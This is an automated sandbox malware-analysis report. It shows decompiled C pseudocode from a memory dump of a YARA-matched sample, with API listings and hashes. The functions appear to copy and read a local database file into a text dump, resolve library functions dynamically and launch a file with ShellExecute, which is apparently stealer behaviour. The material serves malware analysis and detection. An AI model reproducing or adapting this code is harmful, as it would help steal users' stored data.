                                                                                                                              • API String ID: 1754618566-787135837
                                                                                                                              • Opcode ID: c6616a4315f7d14bb24da780d0fbaf2e7fb53b63766f8890632f5e6fc0cc789f
                                                                                                                              • Instruction ID: 951c1c069f48a410e88b64a83560fd4940259fb5ddc57e6de6dc9285112dc84f
                                                                                                                              • Opcode Fuzzy Hash: c6616a4315f7d14bb24da780d0fbaf2e7fb53b63766f8890632f5e6fc0cc789f
                                                                                                                              • Instruction Fuzzy Hash: 4831F076900108ABDB08EFA5DD51FDEB778AB18744F50812AF512B25E1DF786508CB68
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004207B0, Relevance: 12.2, APIs: 8, Instructions: 159COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 92%
                                                                                                                              			E004207B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v540;
				intOrPtr _v544;
				char _v548;
				intOrPtr* _v552;
				char* _v556;
				intOrPtr _v560;
				char _v561;
				intOrPtr* _v568;
				char* _v572;
				intOrPtr _v576;
				char _v577;
				intOrPtr* _v584;
				char* _v588;
				intOrPtr _v592;
				char _v593;
				void* __ebp;
				signed int _t64;
				CHAR* _t69;
				intOrPtr _t72;
				void* _t73;
				intOrPtr* _t74;
				void* _t79;
				intOrPtr _t80;
				intOrPtr* _t81;
				void* _t86;
				intOrPtr* _t88;
				intOrPtr _t92;
				void* _t94;
				intOrPtr _t98;
				intOrPtr _t102;
				intOrPtr _t110;
				intOrPtr _t124;
				intOrPtr _t129;
				signed int _t137;
				void* _t138;
				void* _t144;
				void* _t146;
				void* _t148;
				void* _t149;

				_t136 = __esi;
				_t135 = __edi;
				_t99 = __ebx;
				_t64 =  *0x4301f4; // 0xe687535
				_v12 = _t64 ^ _t137;
				E004091C0( &_v540, 0, 0x104);
				E004091C0( &_v276, 0, 0x104);
				_t69 =  *0x4326f4; // 0x23315f0
				wsprintfA( &_v540, _t69, _a4);
				_v8 = E00416CE0( &_v540, 0);
				_t72 =  *0x43224c; // 0x2331548
				_push(_t72);
				_t73 = E00405DBC(__ebx, __edi, __esi, _t64 ^ _t137);
				_t102 =  *0x43224c; // 0x2331548
				_t74 = E0041A890(_a8, _t102, _t73);
				_t144 = _t138 + 0x3c;
				_v552 = _t74;
				_v556 =  &_v276;
				_v560 = _v556;
				do {
					_v561 =  *_v552;
					 *_v556 = _v561;
					_v552 = _v552 + 1;
					_v556 = _v556 + 1;
					_t153 = _v561;
				} while (_v561 != 0);
				_t124 =  *0x4321c4; // 0x2335990
				_push(_t124);
				_t79 = E00405DBC(__ebx, __edi, __esi, _t153);
				_t80 =  *0x4321c4; // 0x2335990
				_t81 = E0041A890( &_v276, _t80, _t79);
				_t146 = _t144 + 0x10;
				_v568 = _t81;
				_v572 =  &_v276;
				_v576 = _v572;
				do {
					_v577 =  *_v568;
					 *_v572 = _v577;
					_v568 = _v568 + 1;
					_v572 = _v572 + 1;
					_t154 = _v577;
				} while (_v577 != 0);
				_t110 =  *0x4324ec; // 0x23359a8
				_push(_t110);
				_t86 = E00405DBC(__ebx, __edi, __esi, _t154);
				_t129 =  *0x4324ec; // 0x23359a8
				_t88 = E0041A890( &_v276, _t129, _t86);
				_t148 = _t146 + 0x10;
				_v584 = _t88;
				_v588 =  &_v276;
				_v592 = _v588;
				do {
					_v593 =  *_v584;
					 *_v588 = _v593;
					_v584 = _v584 + 1;
					_t133 = _v588 + 1;
					_v588 = _v588 + 1;
				} while (_v593 != 0);
				_t92 = E0040540F(__ebx, _t133, __edi, _a12, ",",  &_v548);
				_t149 = _t148 + 0xc;
				_v544 = _t92;
				while(1) {
					_t156 = _v544;
					if(_v544 == 0) {
						break;
					}
					E004202A0(_t99, _v544, _t135, _t136, _t156, _v8, 0x4294ce,  &_v276, _v544);
					_t133 =  &_v548;
					_t98 = E0040540F(_t99,  &_v548, _t135, 0, ",",  &_v548);
					_t149 = _t149 + 0x1c;
					_v544 = _t98;
				}
				_t94 = E00417A10(_v8);
				__eflags = _v12 ^ _t137;
				return E00404354(_t94, _t99, _v12 ^ _t137, _t133, _t135, _t136);
			}













































                                                                                                                              0x004207b0
                                                                                                                              0x004207b0
                                                                                                                              0x004207b0
                                                                                                                              0x004207b9
                                                                                                                              0x004207c0
                                                                                                                              0x004207d1
                                                                                                                              0x004207e7
                                                                                                                              0x004207f3
                                                                                                                              0x00420800
                                                                                                                              0x0042081a
                                                                                                                              0x0042081d
                                                                                                                              0x00420822
                                                                                                                              0x00420823
                                                                                                                              0x0042082c
                                                                                                                              0x00420837
                                                                                                                              0x0042083c
                                                                                                                              0x0042083f
                                                                                                                              0x0042084b
                                                                                                                              0x00420857
                                                                                                                              0x0042085d
                                                                                                                              0x00420865
                                                                                                                              0x00420877
                                                                                                                              0x00420882
                                                                                                                              0x00420891
                                                                                                                              0x00420897
                                                                                                                              0x00420897
                                                                                                                              0x004208a0
                                                                                                                              0x004208a6
                                                                                                                              0x004208a7
                                                                                                                              0x004208b0
                                                                                                                              0x004208bd
                                                                                                                              0x004208c2
                                                                                                                              0x004208c5
                                                                                                                              0x004208d1
                                                                                                                              0x004208dd
                                                                                                                              0x004208e3
                                                                                                                              0x004208eb
                                                                                                                              0x004208fd
                                                                                                                              0x00420908
                                                                                                                              0x00420917
                                                                                                                              0x0042091d
                                                                                                                              0x0042091d
                                                                                                                              0x00420926
                                                                                                                              0x0042092c
                                                                                                                              0x0042092d
                                                                                                                              0x00420936
                                                                                                                              0x00420944
                                                                                                                              0x00420949
                                                                                                                              0x0042094c
                                                                                                                              0x00420958
                                                                                                                              0x00420964
                                                                                                                              0x0042096a
                                                                                                                              0x00420972
                                                                                                                              0x00420984
                                                                                                                              0x0042098f
                                                                                                                              0x0042099b
                                                                                                                              0x0042099e
                                                                                                                              0x004209a4
                                                                                                                              0x004209bd
                                                                                                                              0x004209c2
                                                                                                                              0x004209c5
                                                                                                                              0x004209cb
                                                                                                                              0x004209cb
                                                                                                                              0x004209d2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004209eb
                                                                                                                              0x004209f3
                                                                                                                              0x00420a01
                                                                                                                              0x00420a06
                                                                                                                              0x00420a09
                                                                                                                              0x00420a09
                                                                                                                              0x00420a15
                                                                                                                              0x00420a20
                                                                                                                              0x00420a2a

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __wgetenv$_memset_strtok_s$wsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1594673334-0
                                                                                                                              • Opcode ID: e02be8a06755b44e2c9d88bf1494623bc16e3b012c7e6589cba44444dd2a2790
                                                                                                                              • Instruction ID: d088c8966d5c9ab565de684a1559397d5dd8539fb1def0dbb97cd76fea656f82
                                                                                                                              • Opcode Fuzzy Hash: e02be8a06755b44e2c9d88bf1494623bc16e3b012c7e6589cba44444dd2a2790
                                                                                                                              • Instruction Fuzzy Hash: BE616AB5D01228ABCB25DB64EC89BDAB7B4AF58304F0441EAE50DA7352E6349FC4CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B950, Relevance: 12.1, APIs: 8, Instructions: 123filestringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 23%
                                                                                                                              			E0041B950(void* __ebx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				char _v284;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __ebp;
				signed int _t33;
				void* _t45;
				int _t46;
				void* _t49;
				intOrPtr _t53;
				void* _t55;
				void* _t63;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				CHAR* _t78;
				intOrPtr _t85;
				void* _t86;
				void* _t87;
				signed int _t88;
				void* _t89;
				void* _t92;
				void* _t93;
				void* _t96;

				_t87 = __esi;
				_t86 = __edi;
				_t63 = __ebx;
				_t33 =  *0x4301f4; // 0xe687535
				_v20 = _t33 ^ _t88;
				GetCurrentDirectoryA(0x104,  &_v548);
				_t64 =  *0x432400; // 0x2336800
				 *0x4328c4( &_v548, _t64);
				CopyFileA(_a4,  &_v548, 1);
				E004091C0( &_v284, 0, 0x104);
				_t78 =  *0x4321a8; // 0x2336150
				wsprintfA( &_v284, _t78, _a12, _a8);
				_t67 =  *0x432390; // 0x2336db8
				_v12 = _t67;
				_t45 =  *0x432750( &_v548,  &_v8);
				_t92 = _t89 + 0x24;
				if(_t45 == 0) {
					_t49 =  *0x432700(_v8, _v12, 0xffffffff,  &_v16, 0);
					_t93 = _t92 + 0x14;
					if(_t49 == 0) {
						_t72 =  *0x4321d0; // 0x23310d8
						_t53 = E004055AB( &_v284, _t72);
						_t93 = _t93 + 8;
						_v552 = _t53;
						if(_v552 != 0) {
							while(1) {
								_t55 =  *0x432720(_v16);
								_t96 = _t93 + 4;
								_t103 = _t55 - 0x64;
								if(_t55 != 0x64) {
									break;
								}
								_v560 =  *0x43273c(_v16, 0);
								_v556 =  *0x43273c(_v16, 1);
								_push(_v556);
								_push(_v560);
								_t85 =  *0x4324f8; // 0x2336700
								_push(_t85);
								_push(_v552);
								E004055C2(_t63, _t86, _t87, _t103);
								_push("\n");
								_push(_v552);
								E004055C2(_t63, _t86, _t87, _t103);
								_t93 = _t96 + 0x28;
							}
							_push(_v552);
							E00405EA3(_t63, _v552, _t86, _t87, __eflags);
							_t93 = _t96 + 4;
						}
					}
					 *0x432724(_v16);
					 *0x432754(_v8);
				}
				_t46 = DeleteFileA( &_v548);
				__eflags = _v20 ^ _t88;
				return E00404354(_t46, _t63, _v20 ^ _t88,  &_v548, _t86, _t87);
			}
































                                                                                                                              0x0041b950
                                                                                                                              0x0041b950
                                                                                                                              0x0041b950
                                                                                                                              0x0041b959
                                                                                                                              0x0041b960
                                                                                                                              0x0041b96f
                                                                                                                              0x0041b975
                                                                                                                              0x0041b983
                                                                                                                              0x0041b996
                                                                                                                              0x0041b9aa
                                                                                                                              0x0041b9ba
                                                                                                                              0x0041b9c8
                                                                                                                              0x0041b9d1
                                                                                                                              0x0041b9d7
                                                                                                                              0x0041b9e5
                                                                                                                              0x0041b9eb
                                                                                                                              0x0041b9f0
                                                                                                                              0x0041ba06
                                                                                                                              0x0041ba0c
                                                                                                                              0x0041ba11
                                                                                                                              0x0041ba17
                                                                                                                              0x0041ba25
                                                                                                                              0x0041ba2a
                                                                                                                              0x0041ba2d
                                                                                                                              0x0041ba3a
                                                                                                                              0x0041ba40
                                                                                                                              0x0041ba44
                                                                                                                              0x0041ba4a
                                                                                                                              0x0041ba4d
                                                                                                                              0x0041ba50
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041ba61
                                                                                                                              0x0041ba76
                                                                                                                              0x0041ba82
                                                                                                                              0x0041ba89
                                                                                                                              0x0041ba8a
                                                                                                                              0x0041ba90
                                                                                                                              0x0041ba97
                                                                                                                              0x0041ba98
                                                                                                                              0x0041baa0
                                                                                                                              0x0041baab
                                                                                                                              0x0041baac
                                                                                                                              0x0041bab1
                                                                                                                              0x0041bab1
                                                                                                                              0x0041babc
                                                                                                                              0x0041babd
                                                                                                                              0x0041bac2
                                                                                                                              0x0041bac2
                                                                                                                              0x0041ba3a
                                                                                                                              0x0041bac9
                                                                                                                              0x0041bad6
                                                                                                                              0x0041badc
                                                                                                                              0x0041bae6
                                                                                                                              0x0041baef
                                                                                                                              0x0041baf9

                                                                                                                              APIs
                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041B96F
                                                                                                                              • lstrcat.KERNEL32(?,02336800), ref: 0041B983
                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0041B996
                                                                                                                              • _memset.LIBCMT ref: 0041B9AA
                                                                                                                              • wsprintfA.USER32 ref: 0041B9C8
                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0041BAE6
                                                                                                                                • Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8
                                                                                                                              • _fprintf.LIBCMT ref: 0041BA98
                                                                                                                              • _fprintf.LIBCMT ref: 0041BAAC
                                                                                                                                • Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
                                                                                                                                • Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
                                                                                                                                • Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
                                                                                                                                • Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcatwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 556801341-0
                                                                                                                              • Opcode ID: bdc4529dd0482d2979656e09d1c06ee7b728cc4a7c1283aba2730c499506d48a
                                                                                                                              • Instruction ID: 1c0e87cc592032f7df9487bb38b6a08066b546de9b6ee00438106ce6f7326440
                                                                                                                              • Opcode Fuzzy Hash: bdc4529dd0482d2979656e09d1c06ee7b728cc4a7c1283aba2730c499506d48a
                                                                                                                              • Instruction Fuzzy Hash: D84171B1900208BBCB14DFA4ED89EEE73B8FF48304F0445A9F60997241D774AA84CF99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420A30, Relevance: 12.1, APIs: 8, Instructions: 112COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 63%
                                                                                                                              			E00420A30(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v20276;
				char _v20540;
				char* _v20544;
				char _v20548;
				intOrPtr _v20552;
				signed int _t36;
				char* _t45;
				intOrPtr _t52;
				void* _t75;
				signed int _t76;
				void* _t77;
				void* _t82;

				_t75 = __esi;
				_t74 = __edi;
				_t60 = __ebx;
				E00412A40(0x5044);
				_t36 =  *0x4301f4; // 0xe687535
				_v12 = _t36 ^ _t76;
				E004091C0( &_v20276, 0, 0x4e20);
				E004091C0( &_v276, 0, 0x104);
				E004091C0( &_v20540, 0, 0x104);
				 *0x432768( &_v20276, _a4);
				_t71 =  &_v20548;
				_t45 = E0040540F(__ebx,  &_v20548, __edi,  &_v20276, ";",  &_v20548);
				_t82 = _t77 + 0x38;
				_v20544 = _t45;
				_v8 = 1;
				while(_v20544 != 0) {
					_v20552 = _v8;
					if(_v20552 == 1) {
						_t71 = _v20544;
						 *0x432768( &_v276, _v20544);
						_t82 = _t82 + 8;
					} else {
						if(_v20552 == 2) {
							_t71 =  &_v20540;
							 *0x432768( &_v20540, _v20544);
							_t82 = _t82 + 8;
						} else {
							if(_v20552 == 3) {
								E004207B0(_t60, _t74, _t75,  &_v276,  &_v20540, _v20544);
								E004091C0( &_v276, 0, 0x104);
								E004091C0( &_v20540, 0, 0x104);
								_t82 = _t82 + 0x24;
								_t71 = _a8;
								 *0x4328d0(_a8);
								_v8 = 0;
							}
						}
					}
					_v8 = _v8 + 1;
					_t52 = E0040540F(_t60, _t71, _t74, 0, ";",  &_v20548);
					_t82 = _t82 + 0xc;
					_v20544 = _t52;
				}
				return E00404354(E004091C0( &_v20276, 0, 0x4e20), _t60, _v12 ^ _t76,  &_v20276, _t74, _t75);
			}


















                                                                                                                              0x00420a30
                                                                                                                              0x00420a30
                                                                                                                              0x00420a30
                                                                                                                              0x00420a38
                                                                                                                              0x00420a3d
                                                                                                                              0x00420a44
                                                                                                                              0x00420a55
                                                                                                                              0x00420a6b
                                                                                                                              0x00420a81
                                                                                                                              0x00420a94
                                                                                                                              0x00420a9d
                                                                                                                              0x00420ab0
                                                                                                                              0x00420ab5
                                                                                                                              0x00420ab8
                                                                                                                              0x00420abe
                                                                                                                              0x00420ac5
                                                                                                                              0x00420ad5
                                                                                                                              0x00420ae2
                                                                                                                              0x00420afb
                                                                                                                              0x00420b09
                                                                                                                              0x00420b0f
                                                                                                                              0x00420ae4
                                                                                                                              0x00420aeb
                                                                                                                              0x00420b1b
                                                                                                                              0x00420b22
                                                                                                                              0x00420b28
                                                                                                                              0x00420aed
                                                                                                                              0x00420af4
                                                                                                                              0x00420b42
                                                                                                                              0x00420b58
                                                                                                                              0x00420b6e
                                                                                                                              0x00420b73
                                                                                                                              0x00420b76
                                                                                                                              0x00420b7a
                                                                                                                              0x00420b80
                                                                                                                              0x00420b80
                                                                                                                              0x00420af4
                                                                                                                              0x00420aeb
                                                                                                                              0x00420b8d
                                                                                                                              0x00420b9e
                                                                                                                              0x00420ba3
                                                                                                                              0x00420ba6
                                                                                                                              0x00420ba6
                                                                                                                              0x00420bd4

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$_strtok_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2385434636-0
                                                                                                                              • Opcode ID: 5b73ba11990efded92794ba239d3f653404a1504c2da1255940934dc07b24593
                                                                                                                              • Instruction ID: 0af7a6de36b6c7e90aa8e6a8f51bfe9d77b64d07dc96b163082216e34aae25e5
                                                                                                                              • Opcode Fuzzy Hash: 5b73ba11990efded92794ba239d3f653404a1504c2da1255940934dc07b24593
                                                                                                                              • Instruction Fuzzy Hash: E64188F1E10218EBDB24EB50EC46BDE7378AF44709F4440EAE7096A182D6745F88CF99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041C690, Relevance: 12.1, APIs: 8, Instructions: 100libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 78%
                                                                                                                              			E0041C690(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebp;
				intOrPtr _t15;
				struct HINSTANCE__* _t19;
				CHAR* _t22;
				struct HINSTANCE__* _t24;
				CHAR* _t27;
				CHAR* _t36;
				CHAR* _t37;
				struct HINSTANCE__* _t38;
				CHAR* _t39;
				struct HINSTANCE__* _t40;
				intOrPtr _t42;
				CHAR* _t43;
				struct HINSTANCE__* _t44;
				CHAR* _t45;
				struct HINSTANCE__* _t46;

				_t57 = _a4;
				if(_a4 == 0) {
					__eflags = 0;
					return 0;
				}
				_t15 =  *0x4320d4; // 0x23310b0
				_push(_t15);
				_v8 = E00405DBC(__ebx, __edi, __esi, _t57);
				_t58 = _v8;
				if(_v8 != 0) {
					_push(0);
					_push(_a4);
					_v12 = E0041A3B0(_v8, ";");
					_push(0);
					_t42 =  *0x432690; // 0x23367e0
					_push(E0041A3B0(_t42, _v12));
					E00406934(__ebx, _v8, __edi, __esi, _t58);
					_v16 = _v12;
					_push(_v16);
					E00405122();
				}
				_t36 =  *0x432440; // 0x23314d8
				 *0x432744 = LoadLibraryA(_t36);
				if( *0x432744 != 0) {
					_t43 =  *0x4322b8; // 0x2335900
					_t19 =  *0x432744; // 0x0
					 *0x432738 = GetProcAddress(_t19, _t43);
					_t37 =  *0x4325a8; // 0x23359d8
					_t44 =  *0x432744; // 0x0
					 *0x432764 = GetProcAddress(_t44, _t37);
					_t22 =  *0x4321e4; // 0x2335f90
					_t38 =  *0x432744; // 0x0
					 *0x432708 = GetProcAddress(_t38, _t22);
					_t45 =  *0x432178; // 0x2335918
					_t24 =  *0x432744; // 0x0
					 *0x432730 = GetProcAddress(_t24, _t45);
					_t39 =  *0x4326d4; // 0x2335fb0
					_t46 =  *0x432744; // 0x0
					 *0x432748 = GetProcAddress(_t46, _t39);
					_t27 =  *0x432338; // 0x23359f0
					_t40 =  *0x432744; // 0x0
					 *0x432728 = GetProcAddress(_t40, _t27);
				}
				if( *0x432738 == 0 ||  *0x432764 == 0 ||  *0x432708 == 0 ||  *0x432748 == 0 ||  *0x432728 == 0 ||  *0x432730 == 0) {
					_v20 = 0;
				} else {
					_v20 = 1;
				}
				return _v20;
			}























                                                                                                                              0x0041c696
                                                                                                                              0x0041c69a
                                                                                                                              0x0041c7fd
                                                                                                                              0x00000000
                                                                                                                              0x0041c7fd
                                                                                                                              0x0041c6a0
                                                                                                                              0x0041c6a5
                                                                                                                              0x0041c6ae
                                                                                                                              0x0041c6b1
                                                                                                                              0x0041c6b5
                                                                                                                              0x0041c6b7
                                                                                                                              0x0041c6bc
                                                                                                                              0x0041c6ce
                                                                                                                              0x0041c6d1
                                                                                                                              0x0041c6d7
                                                                                                                              0x0041c6e6
                                                                                                                              0x0041c6e7
                                                                                                                              0x0041c6f2
                                                                                                                              0x0041c6f8
                                                                                                                              0x0041c6f9
                                                                                                                              0x0041c6fe
                                                                                                                              0x0041c701
                                                                                                                              0x0041c70e
                                                                                                                              0x0041c71a
                                                                                                                              0x0041c720
                                                                                                                              0x0041c727
                                                                                                                              0x0041c733
                                                                                                                              0x0041c738
                                                                                                                              0x0041c73f
                                                                                                                              0x0041c74c
                                                                                                                              0x0041c751
                                                                                                                              0x0041c757
                                                                                                                              0x0041c764
                                                                                                                              0x0041c769
                                                                                                                              0x0041c770
                                                                                                                              0x0041c77c
                                                                                                                              0x0041c781
                                                                                                                              0x0041c788
                                                                                                                              0x0041c795
                                                                                                                              0x0041c79a
                                                                                                                              0x0041c7a0
                                                                                                                              0x0041c7ad
                                                                                                                              0x0041c7ad
                                                                                                                              0x0041c7b9
                                                                                                                              0x0041c7f1
                                                                                                                              0x0041c7e8
                                                                                                                              0x0041c7e8
                                                                                                                              0x0041c7e8
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • __wgetenv.LIBCMT ref: 0041C6A6
                                                                                                                              • LoadLibraryA.KERNEL32(023314D8), ref: 0041C708
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02335900), ref: 0041C72D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023359D8), ref: 0041C746
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02335F90), ref: 0041C75E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02335918), ref: 0041C776
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02335FB0), ref: 0041C78F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023359F0), ref: 0041C7A7
                                                                                                                                • Part of subcall function 00406934: __lock.LIBCMT ref: 00406942
                                                                                                                                • Part of subcall function 00406934: __putenv_helper.LIBCMT ref: 00406951
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$LibraryLoad__lock__putenv_helper__wgetenv
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1998870925-0
                                                                                                                              • Opcode ID: e60d7f6d591f16d836343e78857c423cf86c8eb39a3fc1f5e49d3807ea21be5b
                                                                                                                              • Instruction ID: bc76bed66b964f22f7e203c34eb3bfa844ac2a0ec1f30f63f8b8ac396b1e127b
                                                                                                                              • Opcode Fuzzy Hash: e60d7f6d591f16d836343e78857c423cf86c8eb39a3fc1f5e49d3807ea21be5b
                                                                                                                              • Instruction Fuzzy Hash: 844108B5900204EBD718DFA8FE98B9A77F4F708304F20A53AE515932A0D7F89984CF59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420130, Relevance: 12.1, APIs: 8, Instructions: 96stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 55%
                                                                                                                              			E00420130(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v16;
				signed int _v20;
				char _v288;
				char _v616;
				char _v880;
				signed int _t24;
				signed int _t25;
				void* _t37;
				void* _t38;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				signed int _t68;
				void* _t75;

				_t75 = __eflags;
				_t67 = __esi;
				_t66 = __edi;
				_t48 = __ebx;
				_t24 =  *0x4301f4; // 0xe687535
				_t25 = _t24 ^ _t68;
				_v20 = _t25;
				 *[fs:0x0] =  &_v16;
				E00421620( &_v616, __edi, __esi, 0x429493, 0xfde9, 0, 0, 0);
				_v8 = 0;
				E004091C0( &_v880, 0, 0x104);
				E004091C0( &_v288, 0, 0x104);
				_t62 =  *0x432570; // 0x2330560
				 *0x4328c4( &_v880, _t62, _t25,  *[fs:0x0], E0042670A, 0xffffffff);
				 *0x4328c4( &_v880, E0041A580(_t62, __edi, __esi, _t75, 0xc));
				_t63 =  *0x432404; // 0x2330580
				 *0x4328c4( &_v880, _t63);
				_t37 = E004228E0(__ebx,  &_v616, __edi, __esi, _a4);
				_t76 = _t37;
				if(_t37 != 0) {
					E00421440( &_v616,  &_v880);
					 *0x4328c4( &_v288,  &_v880);
					_t65 =  *0x432254; // 0x23313f0
					 *0x4328c4( &_v288, _t65);
					_t61 =  *0x4326b8; // 0x2331418
					_t63 =  &_v288;
					E0041A200(__ebx, _t61, _t66, _t67, _t76,  &_v288, _t61);
					ShellExecuteA(0, 0,  &_v880, 0x42949a, 0, 0);
				}
				_v8 = 0xffffffff;
				_t38 = E004215C0( &_v616);
				 *[fs:0x0] = _v16;
				return E00404354(_t38, _t48, _v20 ^ _t68, _t63, _t66, _t67);
			}


















                                                                                                                              0x00420130
                                                                                                                              0x00420130
                                                                                                                              0x00420130
                                                                                                                              0x00420130
                                                                                                                              0x00420147
                                                                                                                              0x0042014c
                                                                                                                              0x0042014e
                                                                                                                              0x00420155
                                                                                                                              0x00420171
                                                                                                                              0x00420176
                                                                                                                              0x0042018b
                                                                                                                              0x004201a1
                                                                                                                              0x004201a9
                                                                                                                              0x004201b7
                                                                                                                              0x004201cf
                                                                                                                              0x004201d5
                                                                                                                              0x004201e3
                                                                                                                              0x004201f3
                                                                                                                              0x004201f8
                                                                                                                              0x004201fa
                                                                                                                              0x00420209
                                                                                                                              0x0042021c
                                                                                                                              0x00420222
                                                                                                                              0x00420230
                                                                                                                              0x00420236
                                                                                                                              0x0042023d
                                                                                                                              0x00420244
                                                                                                                              0x00420260
                                                                                                                              0x00420260
                                                                                                                              0x00420266
                                                                                                                              0x00420273
                                                                                                                              0x0042027b
                                                                                                                              0x00420290

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00421620: _memset.LIBCMT ref: 00421634
                                                                                                                                • Part of subcall function 00421620: _strcpy_s.LIBCMT ref: 00421653
                                                                                                                                • Part of subcall function 00421620: _memset.LIBCMT ref: 0042168E
                                                                                                                              • _memset.LIBCMT ref: 0042018B
                                                                                                                              • _memset.LIBCMT ref: 004201A1
                                                                                                                              • lstrcat.KERNEL32(00000000,02330560), ref: 004201B7
                                                                                                                                • Part of subcall function 0041A580: _malloc.LIBCMT ref: 0041A58A
                                                                                                                                • Part of subcall function 0041A580: GetTickCount.KERNEL32 ref: 0041A59B
                                                                                                                                • Part of subcall function 0041A580: _rand.LIBCMT ref: 0041A5C4
                                                                                                                                • Part of subcall function 0041A580: wsprintfA.USER32 ref: 0041A5E0
                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 004201CF
                                                                                                                              • lstrcat.KERNEL32(00000000,02330580), ref: 004201E3
                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0042021C
                                                                                                                              • lstrcat.KERNEL32(?,023313F0), ref: 00420230
                                                                                                                                • Part of subcall function 0041A200: _fprintf.LIBCMT ref: 0041A221
                                                                                                                              • ShellExecuteA.SHELL32(00000000,00000000,00000000,0042949A,00000000,00000000), ref: 00420260
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcat$_memset$CountExecuteShellTick_fprintf_malloc_rand_strcpy_swsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1303573618-0
                                                                                                                              • Opcode ID: 4fa4fbf4923644e05247681e06b819e42152c1fdb312beb334c5ad132b7c9d23
                                                                                                                              • Instruction ID: 1eb8018900904a953f08b4ff037de75d929d5fbdf90869bddc2b7de24f6974f4
                                                                                                                              • Opcode Fuzzy Hash: 4fa4fbf4923644e05247681e06b819e42152c1fdb312beb334c5ad132b7c9d23
                                                                                                                              • Instruction Fuzzy Hash: 8B31C8B6A40218BBD718EB50DD46FDAB3BCFB04704F0082AAF616661C0DB756B44CF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

